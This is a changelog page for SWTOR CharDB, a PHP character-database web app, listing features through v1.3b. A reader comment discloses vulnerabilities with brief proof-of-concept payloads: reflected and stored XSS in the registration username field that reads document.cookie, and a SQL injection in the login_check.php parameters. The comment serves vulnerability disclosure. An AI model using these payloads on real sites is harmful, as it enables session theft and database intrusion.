Changelog

v1.0 / Initial Release

Basic Functionality has been tested and is stable.

  • Semi-Automated Setup Process
  • Add Characters
  • Edit Characters
  • Main Character Listing (home page)
  • Admin Login/Out

v1.1 / Update 1

  • Improved visuals, header area with graphical logo
  • consistency accross pages
  • hidden passwords on the login form.

v1.1b / Update 1, part 2

  • Selection lists on the add and edit character screen are now polled from the internal database instead of hand-typed
  • Edit character screen will now “remember” the characters race, class, advanced class, and all 3 skills
  • Further consistency changes (added a consistent footer and added header on more pages)

1.2 / Major Upgrade

  • Added Support for Social Ranks
  • Added Support for Alignment(Light/Neutral/Dark)
  • Added Support for Honor Ranks
  • Ability for admins to delete characters
  • Ability to select which columns appear on Character Listing
  • JavaScript Table Sorting on Character Listing

1.3 / Upgrade

  • Footer added to most pages
  • Ability for users to register on the db
  • Ability for users to add own characters (Association to account which created the character in DB)
  • Enabled Administrator ability to change username when registering

1.3b / Minor Upgrade

  • Ability to Edit Users

2 comments on “Changelog

  1. Hi,

    I’ve found some security vulnerabilities in the version 1.8b of SWTOR CharDB

    Here are the PoC:

    ==================
    PoC-Exploit
    ==================

    // XSS
    http://target/swtor/user/register.php
    Username: alert(document.cookie)
    Password: whatever

    // Stored XSS
    http://target/swtor/user/register.php
    Username: 1–>1alert(document.cookie)<!–
    Password: whatever

    Visit: http://target/swtor/index.php?view=members

    // SQL-Injection
    http://target/swtor/user/login_check.php?swtorpw=1&swtorun=sql injection]

    Advisory: http://www.darksecurity.de/advisories/2012/SSCHADV2012-009.txt

Leave a Reply to admin Cancel reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>